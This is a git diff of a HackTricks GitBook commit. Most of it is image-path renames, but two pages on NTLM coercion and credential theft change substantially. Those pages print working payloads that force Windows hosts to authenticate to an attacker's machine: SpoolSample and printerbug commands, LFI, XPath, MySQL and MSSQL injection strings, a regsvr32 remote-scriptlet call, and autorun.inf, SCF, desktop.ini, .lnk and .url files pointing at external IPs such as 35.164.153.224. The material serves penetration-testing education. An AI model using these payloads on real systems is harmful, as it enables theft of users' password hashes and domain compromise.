GitBook: [#3314] No subject
BIN
.gitbook/assets/image (307) (5).png
Normal file
After Width: | Height: | Size: 509 KiB |
Before Width: | Height: | Size: 509 KiB After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (618) (3).png
Normal file
After Width: | Height: | Size: 27 KiB |
Before Width: | Height: | Size: 27 KiB After Width: | Height: | Size: 102 KiB |
BIN
.gitbook/assets/image (637) (1) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 68 KiB |
Before Width: | Height: | Size: 68 KiB After Width: | Height: | Size: 102 KiB |
Before Width: | Height: | Size: 102 KiB After Width: | Height: | Size: 73 KiB |
Before Width: | Height: | Size: 73 KiB After Width: | Height: | Size: 261 KiB |
Before Width: | Height: | Size: 261 KiB After Width: | Height: | Size: 13 KiB |
BIN
.gitbook/assets/image (638) (2) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 17 KiB |
Before Width: | Height: | Size: 17 KiB After Width: | Height: | Size: 88 KiB |
Before Width: | Height: | Size: 88 KiB After Width: | Height: | Size: 3.6 KiB |
Before Width: | Height: | Size: 3.6 KiB After Width: | Height: | Size: 28 KiB |
Before Width: | Height: | Size: 28 KiB After Width: | Height: | Size: 99 KiB |
Before Width: | Height: | Size: 8.4 KiB After Width: | Height: | Size: 9.8 KiB |
Before Width: | Height: | Size: 9.8 KiB After Width: | Height: | Size: 120 KiB |
BIN
.gitbook/assets/image (660) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 170 KiB |
Before Width: | Height: | Size: 170 KiB After Width: | Height: | Size: 686 KiB |
Before Width: | Height: | Size: 686 KiB After Width: | Height: | Size: 55 KiB |
Before Width: | Height: | Size: 55 KiB After Width: | Height: | Size: 18 KiB |
BIN
.gitbook/assets/image (663) (1).png
Normal file
After Width: | Height: | Size: 256 KiB |
Before Width: | Height: | Size: 256 KiB After Width: | Height: | Size: 151 KiB |
|
@ -118,7 +118,7 @@ If you want more details about the networking topics introduced here, go to the
|
||||||
|
|
||||||
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
|
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (637).png>)
|
![](<../../.gitbook/assets/image (637) (1).png>)
|
||||||
|
|
||||||
This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
|
This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).
|
||||||
|
|
||||||
|
|
|
@ -141,7 +141,7 @@ A rule/signature consists of the following:
|
||||||
* The **header**, defining the protocol, IP addresses, ports and direction of the rule.
|
* The **header**, defining the protocol, IP addresses, ports and direction of the rule.
|
||||||
* The **rule options**, defining the specifics of the rule.
|
* The **rule options**, defining the specifics of the rule.
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (642).png>)
|
![](<../../../.gitbook/assets/image (642) (3).png>)
|
||||||
|
|
||||||
#### **Valid actions are**
|
#### **Valid actions are**
|
||||||
|
|
||||||
|
|
|
@ -96,7 +96,7 @@ vi modules/pam_unix/pam_unix_auth.c
|
||||||
|
|
||||||
Let’s change this by:
|
Let’s change this by:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (638).png>)
|
![](<../../.gitbook/assets/image (638) (2).png>)
|
||||||
|
|
||||||
This will allow any user using the **password "0xMitsurugi"** to log in.
|
This will allow any user using the **password "0xMitsurugi"** to log in.
|
||||||
|
|
||||||
|
|
|
@ -34,7 +34,7 @@ Electron has 2 process types:
|
||||||
* Main Process (has complete access to NodeJS)
|
* Main Process (has complete access to NodeJS)
|
||||||
* Renderer Process (should have NodeJS restricted access for security reasons)
|
* Renderer Process (should have NodeJS restricted access for security reasons)
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (307).png>)
|
![](<../../../.gitbook/assets/image (307) (5).png>)
|
||||||
|
|
||||||
A **renderer process** will be a browser window loading a file:
|
A **renderer process** will be a browser window loading a file:
|
||||||
|
|
||||||
|
@ -199,7 +199,7 @@ The desktop application **overrides these listeners** to implement the desktop a
|
||||||
|
|
||||||
**Here is a simplified pseudocode:**
|
**Here is a simplified pseudocode:**
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (638) (2) (1).png>)
|
![](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
|
||||||
|
|
||||||
![](<../../../.gitbook/assets/image (620).png>)
|
![](<../../../.gitbook/assets/image (620).png>)
|
||||||
|
|
||||||
|
|
|
@ -351,7 +351,7 @@ When the browser finds that the **domain isn't responding** to him, it will **us
|
||||||
Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
|
Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
|
||||||
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
|
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
|
||||||
|
|
||||||
<img src="../.gitbook/assets/image (638) (2) (1) (1).png" alt="" data-size="original">
|
<img src="../.gitbook/assets/image (638) (2) (1) (1) (1).png" alt="" data-size="original">
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (620) (4).png>)
|
![](<../.gitbook/assets/image (620) (4).png>)
|
||||||
|
|
|
@ -100,7 +100,7 @@ In case `trustURLCodebase` is `true`, an attacker can provide his own classes in
|
||||||
|
|
||||||
It's easier to attack this LDAP using **JavaFactory references**:
|
It's easier to attack this LDAP using **JavaFactory references**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (660) (1).png>)
|
![](<../../.gitbook/assets/image (660) (1) (1).png>)
|
||||||
|
|
||||||
## Log4Shell Vulnerability
|
## Log4Shell Vulnerability
|
||||||
|
|
||||||
|
|
|
@ -158,7 +158,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
|
||||||
|
|
||||||
The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
|
The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (637) (1) (1).png>)
|
![](<../../.gitbook/assets/image (637) (1) (1) (1).png>)
|
||||||
|
|
||||||
The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
|
The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:
|
||||||
|
|
||||||
|
|
|
@ -56,7 +56,7 @@ With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with t
|
||||||
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
|
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
|
||||||
* In frames of information you usually should **find different frames well aligned between them**:
|
* In frames of information you usually should **find different frames well aligned between them**:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (660).png>)
|
![](<../../.gitbook/assets/image (660) (1).png>)
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (652) (1) (1).png>)
|
![](<../../.gitbook/assets/image (652) (1) (1).png>)
|
||||||
|
|
||||||
|
@ -101,7 +101,7 @@ You can **select the whole signal** where information is located, select **Ampli
|
||||||
|
|
||||||
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
|
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (637) (1).png>)
|
![](<../../.gitbook/assets/image (637) (1) (1).png>)
|
||||||
|
|
||||||
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
|
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Force NTLM Privileged Authentication
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -16,13 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Spooler Service Abuse
|
||||||
# Spooler Service Abuse
|
|
||||||
|
|
||||||
If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
|
If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controller’s print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
|
||||||
Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
|
Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
|
||||||
|
|
||||||
## Finding Windows Servers on the domain
|
### Finding Windows Servers on the domain
|
||||||
|
|
||||||
Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
|
Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
|
||||||
|
|
||||||
|
@ -30,7 +29,7 @@ Using PowerShell, get a list of Windows boxes. Servers are usually priority, so
|
||||||
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
|
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## Finding Spooler services listening
|
### Finding Spooler services listening
|
||||||
|
|
||||||
Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
|
Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
|
||||||
|
|
||||||
|
@ -45,7 +44,7 @@ You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
|
||||||
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
|
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
|
||||||
```
|
```
|
||||||
|
|
||||||
## Ask the service to authenticate against an arbitrary host
|
### Ask the service to authenticate against an arbitrary host
|
||||||
|
|
||||||
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
|
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
|
||||||
|
|
||||||
|
@ -53,33 +52,36 @@ You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMt
|
||||||
SpoolSample.exe <TARGET> <RESPONDERIP>
|
SpoolSample.exe <TARGET> <RESPONDERIP>
|
||||||
```
|
```
|
||||||
|
|
||||||
or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
|
or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
|
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
|
||||||
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
|
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
|
||||||
```
|
```
|
||||||
|
|
||||||
## Combining with Unconstrained Delegation
|
### Combining with Unconstrained Delegation
|
||||||
|
|
||||||
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
|
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
|
||||||
|
|
||||||
# Inside Windows
|
## RCP Force authentication
|
||||||
|
|
||||||
|
{% embed url="https://github.com/p0dalirius/Coercer" %}
|
||||||
|
|
||||||
|
## Inside Windows
|
||||||
|
|
||||||
If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
|
If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
|
||||||
|
|
||||||
## Defender MpCmdRun
|
### Defender MpCmdRun
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
|
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
# Cracking NTLMv1
|
## Cracking NTLMv1
|
||||||
|
|
||||||
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
|
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
|
||||||
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
|
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||||
|
@ -95,5 +97,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Places to steal NTLM creds
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -16,46 +16,45 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## Automatic Payloads Creation & Other lists
|
||||||
|
|
||||||
# Automatic Payloads Creation & Other lists
|
### [ntlm\_theft](https://github.com/Greenwolf/ntlm\_theft)
|
||||||
|
|
||||||
## [ntlm\_theft](https://github.com/Greenwolf/ntlm_theft)
|
|
||||||
|
|
||||||
This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**.
|
This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**.
|
||||||
|
|
||||||
### ntlm\_theft supports the following attack types:
|
#### ntlm\_theft supports the following attack types:
|
||||||
|
|
||||||
Browse to Folder Containing:
|
Browse to Folder Containing:
|
||||||
|
|
||||||
* .url – via URL field
|
* .url – via URL field
|
||||||
* .url – via ICONFILE field
|
* .url – via ICONFILE field
|
||||||
* .lnk - via icon\_location field
|
* .lnk - via icon\_location field
|
||||||
* .scf – via ICONFILE field \(Not Working on Latest Windows\)
|
* .scf – via ICONFILE field (Not Working on Latest Windows)
|
||||||
* autorun.inf via OPEN field \(Not Working on Latest Windows\)
|
* autorun.inf via OPEN field (Not Working on Latest Windows)
|
||||||
* desktop.ini - via IconResource field \(Not Working on Latest Windows\)
|
* desktop.ini - via IconResource field (Not Working on Latest Windows)
|
||||||
|
|
||||||
Open Document:
|
Open Document:
|
||||||
|
|
||||||
* .xml – via Microsoft Word external stylesheet
|
* .xml – via Microsoft Word external stylesheet
|
||||||
* .xml – via Microsoft Word includepicture field
|
* .xml – via Microsoft Word includepicture field
|
||||||
* .htm – via Chrome & IE & Edge img src \(only if opened locally, not hosted\)
|
* .htm – via Chrome & IE & Edge img src (only if opened locally, not hosted)
|
||||||
* .docx – via Microsoft Word includepicture field
|
* .docx – via Microsoft Word includepicture field
|
||||||
|
|
||||||
-.docx – via Microsoft Word external template
|
\-.docx – via Microsoft Word external template
|
||||||
|
|
||||||
-.docx – via Microsoft Word frameset webSettings
|
\-.docx – via Microsoft Word frameset webSettings
|
||||||
|
|
||||||
-.xlsx - via Microsoft Excel external cell
|
\-.xlsx - via Microsoft Excel external cell
|
||||||
|
|
||||||
-.wax - via Windows Media Player playlist \(Better, primary open\)
|
\-.wax - via Windows Media Player playlist (Better, primary open)
|
||||||
|
|
||||||
-.asx – via Windows Media Player playlist \(Better, primary open\)
|
\-.asx – via Windows Media Player playlist (Better, primary open)
|
||||||
|
|
||||||
-.m3u – via Windows Media Player playlist \(Worse, Win10 opens first in Groovy\)
|
\-.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
|
||||||
|
|
||||||
-.jnlp – via Java external jar
|
\-.jnlp – via Java external jar
|
||||||
|
|
||||||
-.application – via any Browser \(Must be served via a browser downloaded or won’t run\)
|
\-.application – via any Browser (Must be served via a browser downloaded or won’t run)
|
||||||
|
|
||||||
Open Document and Accept Popup:
|
Open Document and Accept Popup:
|
||||||
|
|
||||||
|
@ -88,29 +87,31 @@ Click Link in Chat Program:
|
||||||
> Generation Complete.
|
> Generation Complete.
|
||||||
> ```
|
> ```
|
||||||
|
|
||||||
## [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All_NTLM_leak)
|
### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All\_NTLM\_leak)
|
||||||
|
|
||||||
> Cheatsheet
|
> Cheatsheet
|
||||||
|
|
||||||
This is a list of techniques to force NTLM authentications to steal credentials from the victim.
|
This is a list of techniques to force NTLM authentications to steal credentials from the victim.
|
||||||
|
|
||||||
## Force NTLM Privileged Authentication
|
### Force NTLM Privileged Authentication
|
||||||
|
|
||||||
You may be able to **force a windows machine to authenticate to an arbitrary machine** using a privileged account. Read the following page to learn more:
|
You may be able to **force a windows machine to authenticate to an arbitrary machine** using a privileged account. Read the following page to learn more:
|
||||||
|
|
||||||
{% page-ref page="../active-directory-methodology/printers-spooler-service-abuse.md" %}
|
{% content-ref url="../active-directory-methodology/printers-spooler-service-abuse.md" %}
|
||||||
|
[printers-spooler-service-abuse.md](../active-directory-methodology/printers-spooler-service-abuse.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
# LFI
|
## LFI
|
||||||
|
|
||||||
The include\(\) in PHP will resolve the network path for us.
|
The include() in PHP will resolve the network path for us.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/?page=//11.22.33.44/@OsandaMalith
|
http://host.tld/?page=//11.22.33.44/@OsandaMalith
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/lfi.png?w=640)
|
![](<../../.gitbook/assets/image (642).png>)
|
||||||
|
|
||||||
# XXE
|
## XXE
|
||||||
|
|
||||||
In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
|
In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
|
||||||
|
|
||||||
|
@ -126,51 +127,49 @@ In here I’m using “php://filter/convert.base64-encode/resource=” that will
|
||||||
</root>
|
</root>
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/xxe.png?w=640)
|
![](<../../.gitbook/assets/image (618).png>)
|
||||||
|
|
||||||
# XPath Injection
|
## XPath Injection
|
||||||
|
|
||||||
Usually, doc\(\) is used in out-of-band XPath injections, thus can be applied in resolving a network path.
|
Usually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
|
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/xpath.png?w=640)
|
![](<../../.gitbook/assets/image (638).png>)
|
||||||
|
|
||||||
# MySQL Injection
|
## MySQL Injection
|
||||||
|
|
||||||
I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/)on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.
|
I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/)on MySQL out-of-band injections which can be applied over the internet. You can also use ‘INTO OUTFILE’ to resolve a network path.
|
||||||
|
|
||||||
```text
|
```
|
||||||
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
|
http://host.tld/index.php?id=1’ union select 1,2,load_file(‘\\\\192.168.0.100\\@OsandaMalith’),4;%00
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/02/overinternet.png?w=640)
|
![](<../../.gitbook/assets/image (663).png>)
|
||||||
|
|
||||||
# MSSQL
|
## MSSQL
|
||||||
|
|
||||||
Since stacked queries are supported we can call stored procedures.
|
Since stacked queries are supported we can call stored procedures.
|
||||||
|
|
||||||
```text
|
```
|
||||||
';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
|
';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
|
||||||
```
|
```
|
||||||
|
|
||||||
# Regsvr32
|
## Regsvr32
|
||||||
|
|
||||||
Accidently found this one while experimenting with .sct files.
|
Accidently found this one while experimenting with .sct files.
|
||||||
|
|
||||||
```text
|
```
|
||||||
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
|
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/regsvr32.png?w=640)
|
## Batch
|
||||||
|
|
||||||
# Batch
|
|
||||||
|
|
||||||
There are many possible ways you can explore
|
There are many possible ways you can explore
|
||||||
|
|
||||||
```text
|
```
|
||||||
echo 1 > //192.168.0.1/abc
|
echo 1 > //192.168.0.1/abc
|
||||||
pushd \\192.168.0.1\abc
|
pushd \\192.168.0.1\abc
|
||||||
cmd /k \\192.168.0.1\abc
|
cmd /k \\192.168.0.1\abc
|
||||||
|
@ -182,32 +181,30 @@ dir\\192.168.0.1\abc
|
||||||
find, findstr, [x]copy, move, replace, del, rename and many more!
|
find, findstr, [x]copy, move, replace, del, rename and many more!
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/batch.png?w=640)
|
## Auto-Complete
|
||||||
|
|
||||||
# Auto-Complete
|
|
||||||
|
|
||||||
You just need to type ‘\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
You just need to type ‘\host\’ the auto-complete will do the trick under the explorer and the run dialog box.
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/explorer.png?w=640)
|
![](<../../.gitbook/assets/image (660).png>)
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/run.png?w=640)
|
![](<../../.gitbook/assets/image (637).png>)
|
||||||
|
|
||||||
# Autorun.inf
|
## Autorun.inf
|
||||||
|
|
||||||
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
|
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
|
||||||
|
|
||||||
```text
|
```
|
||||||
[autorun]
|
[autorun]
|
||||||
open=\\35.164.153.224\setup.exe
|
open=\\35.164.153.224\setup.exe
|
||||||
icon=something.ico
|
icon=something.ico
|
||||||
action=open Setup.exe
|
action=open Setup.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
# Shell Command Files
|
## Shell Command Files
|
||||||
|
|
||||||
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF \(Shell Command Files\) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
|
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
|
||||||
|
|
||||||
```text
|
```
|
||||||
[Shell]
|
[Shell]
|
||||||
Command=2
|
Command=2
|
||||||
IconFile=\\AttackerIP\ordinary.ico
|
IconFile=\\AttackerIP\ordinary.ico
|
||||||
|
@ -215,11 +212,11 @@ IconFile=\\AttackerIP\ordinary.ico
|
||||||
Command=ToggleDesktop
|
Command=ToggleDesktop
|
||||||
```
|
```
|
||||||
|
|
||||||
# Desktop.ini
|
## Desktop.ini
|
||||||
|
|
||||||
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
|
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
|
||||||
|
|
||||||
```text
|
```
|
||||||
mkdir openMe
|
mkdir openMe
|
||||||
attrib +s openMe
|
attrib +s openMe
|
||||||
cd openMe
|
cd openMe
|
||||||
|
@ -230,17 +227,17 @@ attrib +s +h desktop.ini
|
||||||
|
|
||||||
In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
|
In Windows XP systems the desktop.ini file uses ‘IcondFile’ instead of ‘IconResource’.
|
||||||
|
|
||||||
```text
|
```
|
||||||
[.ShellClassInfo]
|
[.ShellClassInfo]
|
||||||
IconFile=\\192.168.0.1\aa
|
IconFile=\\192.168.0.1\aa
|
||||||
IconIndex=1337
|
IconIndex=1337
|
||||||
```
|
```
|
||||||
|
|
||||||
# Shortcut Files \(.lnk\)
|
## Shortcut Files (.lnk)
|
||||||
|
|
||||||
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
|
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
|
||||||
|
|
||||||
```text
|
```
|
||||||
Set shl = CreateObject("WScript.Shell")
|
Set shl = CreateObject("WScript.Shell")
|
||||||
Set fso = CreateObject("Scripting.FileSystemObject")
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||||
currentFolder = shl.CurrentDirectory
|
currentFolder = shl.CurrentDirectory
|
||||||
|
@ -257,7 +254,7 @@ sc.Save
|
||||||
|
|
||||||
The Powershell version.
|
The Powershell version.
|
||||||
|
|
||||||
```text
|
```
|
||||||
$objShell = New-Object -ComObject WScript.Shell
|
$objShell = New-Object -ComObject WScript.Shell
|
||||||
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
|
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
|
||||||
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
|
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
|
||||||
|
@ -268,55 +265,53 @@ $lnk.HotKey = "Ctrl+Alt+O"
|
||||||
$lnk.Save()
|
$lnk.Save()
|
||||||
```
|
```
|
||||||
|
|
||||||
![](https://osandamalith.files.wordpress.com/2017/03/shortcut2.png?w=640)
|
## Internet Shortcuts (.url)
|
||||||
|
|
||||||
# Internet Shortcuts \(.url\)
|
|
||||||
|
|
||||||
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
|
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
|
||||||
|
|
||||||
```text
|
```
|
||||||
echo [InternetShortcut] > stealMyHashes.url
|
echo [InternetShortcut] > stealMyHashes.url
|
||||||
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
|
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
|
||||||
```
|
```
|
||||||
|
|
||||||
# Autorun with Registry
|
## Autorun with Registry
|
||||||
|
|
